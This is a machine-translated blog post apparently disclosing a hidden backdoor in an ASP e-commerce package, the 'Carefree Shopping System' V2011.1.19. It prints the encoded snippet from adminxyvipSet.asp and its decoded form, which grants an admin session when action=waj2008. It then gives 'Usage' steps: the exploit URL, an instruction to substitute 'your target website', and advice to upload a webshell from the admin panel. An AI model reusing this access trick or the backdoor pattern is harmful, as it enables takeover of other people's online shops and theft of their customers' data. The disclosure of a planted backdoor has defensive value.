Webshell exists in ASP fashion edition of carefree Shopping System

FROM http://www.st999.cn/blog

By wandering

Program: carefree Shopping System ASP fashion Edition

Vulnerability: There is a backdoor. You can directly log on to the shell. I don't know if this backdoor exists or is added by someone else. I didn't pay attention to it in previous versions.

: Webshells exist for the download from the following two addresses, and none of the other websites can be viewed.

Asp/3090.html "> http://down.admin5.com/asp/3090.html

Http://www.onlinedown.net/soft/85106.htm

Webshell file: adminxyvipSet. asp

I did nothing the other day. I just saw "Carefree Shopping System ASP fashion edition V2011.1.19". This version seems to be new. I have seen it in previous versions and there are many vulnerabilities. What about this version?

Just today, we have time to download and read it. I didn't expect the vulnerability to be found yet, but the backdoor was found to be a dizzy one. If the vulnerability is not found, such a large backdoor exists, what else can I find...

In the xyvipSet. asp file, there is a place encrypted, so I am surprised that the entire program is not encrypted. What is the secret of encryption in this place?

"# @ ~ ^ IQAAAA ==##@ & kW, D; E/DcJmmOkKxEb {Jhm % Z! % R ~ Otx @ # @ & d + ddbWU 'rCNskUE * jacn t! RE @ # @ & d/kkW 'rWVmoE # {F # @ & M +/aGxk + R "n [kM + 1Y ~ JrU9 + aRmdwr #@& n NPrW #@& pCYAAA == #~ @"

Decrypted and the plaintext is displayed.

If request ("action") = "waj2008" then
Session ("admin") = "waj2008"
Session ("flag") = 1
Response. Redirect "index. asp"
End if

Khan, the arrogant backdoor.

 

Usage: http://www.st999.cn/admin/xyvipset.asp? Action = waj2008

Replace www.st999.cn with your target website.

Go to the background and use the upload method to get the shell.